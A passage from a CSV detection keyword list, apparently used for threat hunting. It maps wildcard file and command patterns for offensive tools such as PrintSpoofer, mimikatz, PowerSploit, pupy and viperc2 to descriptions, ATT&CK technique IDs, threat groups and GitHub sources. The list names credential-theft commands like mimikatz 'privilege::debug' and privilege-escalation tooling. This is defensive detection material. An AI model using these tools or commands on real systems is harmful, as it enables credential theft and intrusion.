tools","https://github.com/BeetleChunks/SpoolSploit","1","0","N/A","N/A","6","533","90","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z" +"*printnightmare_check*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*printspoofer -Command*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" +"*PrintSpoofer-*","offensive_tool_keyword","cobaltstrike","Reflection dll implementation of PrintSpoofer used in conjunction with Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - 
Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crisprss/PrintSpoofer","1","1","N/A","10","10","76","8","2021-10-07T17:45:00Z","2021-10-07T17:28:45Z" +"*PrintSpoofer.*","offensive_tool_keyword","cobaltstrike","Reflection dll implementation of PrintSpoofer used in conjunction with Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crisprss/PrintSpoofer","1","1","N/A","10","10","76","8","2021-10-07T17:45:00Z","2021-10-07T17:28:45Z" +"*PrintSpoofer.cpp*","offensive_tool_keyword","PrintSpoofer","Abusing Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","10","10","1573","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" +"*PrintSpoofer.cpp*","offensive_tool_keyword","printspoofer","Abusing impersonation privileges through the Printer Bug","T1134 - T1003 - 
T1055","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","0","N/A","10","10","1573","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" +"*PrintSpoofer.exe*","offensive_tool_keyword","PrintSpoofer","Abusing Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","10","10","1573","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" +"*printspoofer.exe*","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","1","N/A","10","6","575","94","2023-10-02T03:31:07Z","2021-12-28T13:14:25Z" +"*printspoofer.py*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" +"*PrintSpoofer.sln*","offensive_tool_keyword","PrintSpoofer","Abusing Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","10","10","1573","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" +"*PrintSpoofer_x64.exe*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - 
TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" +"*PrintSpoofer32.exe*","offensive_tool_keyword","PrintSpoofer","Abusing Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","10","10","1573","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" +"*PrintSpoofer32.exe*","offensive_tool_keyword","printspoofer","Abusing impersonation privileges through the Printer Bug","T1134 - T1003 - T1055","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","10","10","1573","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" +"*PrintSpoofer64.exe*","offensive_tool_keyword","PrintSpoofer","Abusing Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","10","10","1573","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" +"*PrintSpoofer64.exe*","offensive_tool_keyword","printspoofer","Abusing impersonation privileges through the Printer Bug","T1134 - T1003 - T1055","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","10","10","1573","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" +"*PrintSpoofer-master*","offensive_tool_keyword","PrintSpoofer","Abusing Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","10","10","1573","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" +"*PrintSpoofer-master*","offensive_tool_keyword","printspoofer","Abusing impersonation privileges through the Printer Bug","T1134 - 
T1003 - T1055","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","10","10","1573","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" +"*Priv Esc Check Bof*","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","9","3","265","35","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z" +"*priv/priv_windows.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*privcheck.cna*","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","9","3","265","35","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z" +"*privcheck32*","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","1","N/A","9","3","265","35","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z" +"*PrivEditor.dll*","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - 
T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","1","N/A","10","6","575","94","2023-10-02T03:31:07Z","2021-12-28T13:14:25Z" +"*Privesc.psm1*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Privesc.tests.ps1*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*privesc_checker*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*privesc_checker.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*privesc_juicy_potato.py*","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1100 - T1059 - T1505","TA0002 - TA0003 - TA0004","N/A","N/A","Web Attacks","https://github.com/antonioCoco/SharPyShell","1","1","N/A","N/A","9","809","144","2023-09-27T08:48:31Z","2019-03-10T22:09:40Z" +"*privesc_powerup.py*","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1100 - T1059 - T1505","TA0002 - TA0003 - TA0004","N/A","N/A","Web 
Attacks","https://github.com/antonioCoco/SharPyShell","1","1","N/A","N/A","9","809","144","2023-09-27T08:48:31Z","2019-03-10T22:09:40Z" +"*privesc-check*","offensive_tool_keyword","windows-privesc-check","privesc script checker - Windows-privesc-check is standalone executable that runs on Windows systems. It tries to find misconfigurations that could allow local unprivileged users to escalate privileges to other users or to access local apps (e.g. databases).","T1048 - T1059 - T1088 - T1208","TA0004 - TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/pentestmonkey/windows-privesc-check","1","1","N/A","N/A","10","1394","336","2023-08-01T07:35:20Z","2015-03-22T13:39:38Z" +"*PrivescCheck.ps1*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*PrivescCheck_*.*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*PrivescCheckAsciiReport*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*PrivEscManager.cs*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - 
TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*privexchange.py*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*privexchange.py*","offensive_tool_keyword","PrivExchange","Exchange your privileges for Domain Admin privs by abusing Exchange","T1091.001 - T1101 - T1201 - T1570","TA0006","N/A","N/A","Exploitation tools","https://github.com/dirkjanm/PrivExchange","1","1","N/A","N/A","10","905","170","2020-01-23T19:48:51Z","2019-01-21T17:39:47Z" +"*privexchange.py*","offensive_tool_keyword","privexchange","Exchange your privileges for Domain Admin privs by abusing Exchange","T1053.005 - T1078 - T1069.002","TA0002 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/dirkjanm/PrivExchange","1","1","N/A","N/A","10","905","170","2020-01-23T19:48:51Z","2019-01-21T17:39:47Z" +"*PrivExchange-master.zip*","offensive_tool_keyword","privexchange","Exchange your privileges for Domain Admin privs by abusing Exchange","T1053.005 - T1078 - T1069.002","TA0002 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/dirkjanm/PrivExchange","1","1","N/A","N/A","10","905","170","2020-01-23T19:48:51Z","2019-01-21T17:39:47Z" +"*PrivFu-main.zip*","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege 
Escalation","https://github.com/daem0nc0re/PrivFu/","1","1","N/A","10","6","575","94","2023-10-02T03:31:07Z","2021-12-28T13:14:25Z" +"*PrivFu-master*","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","1","N/A","10","6","575","94","2023-10-02T03:31:07Z","2021-12-28T13:14:25Z" +"*privilege::backup*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*privilege::debug*","offensive_tool_keyword","mimikatz","mimikatz exploitation command","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*privilege::debug*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known 
to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*privilege::driver*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*privilege::id*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*privilege::name*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*privilege::restore*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*privilege::security*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*privilege::sysenv*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*privilege::tcb*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*Privileged Accounts - Layers Analysis.txt*","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","AD Enumeration","https://github.com/cyberark/ACLight","1","0","N/A","7","8","730","150","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" +"*Privileged Accounts Permissions - Final Report.csv*","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","AD 
Enumeration","https://github.com/cyberark/ACLight","1","0","N/A","7","8","730","150","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" +"*Privileged Accounts Permissions - Irregular Accounts.csv*","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","AD Enumeration","https://github.com/cyberark/ACLight","1","0","N/A","7","8","730","150","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" +"*PrivilegeEscalation*","offensive_tool_keyword","PrivilegeEscalation","This program is a very short batch file which allows you to run anything with admin rights without prompting user could be related to other tools using privsec methods","T1548.001 - T1548.003 - T1548.008","TA0004 - TA0002","N/A","N/A","Exploitation tools","https://github.com/LouisVallat/PrivilegeEscalation","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*PrivilegeEscalation_BypassUserAccountControl_Windows.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*PrivilegeEscalation_EnumPatchExample_Windows.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - 
T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*PrivilegeEscalation_ExploitationForPrivilegeEscalation_CVE_2021_40449.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*PrivilegeEscalation_ExploitationForPrivilegeEscalation_EfsPotato.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 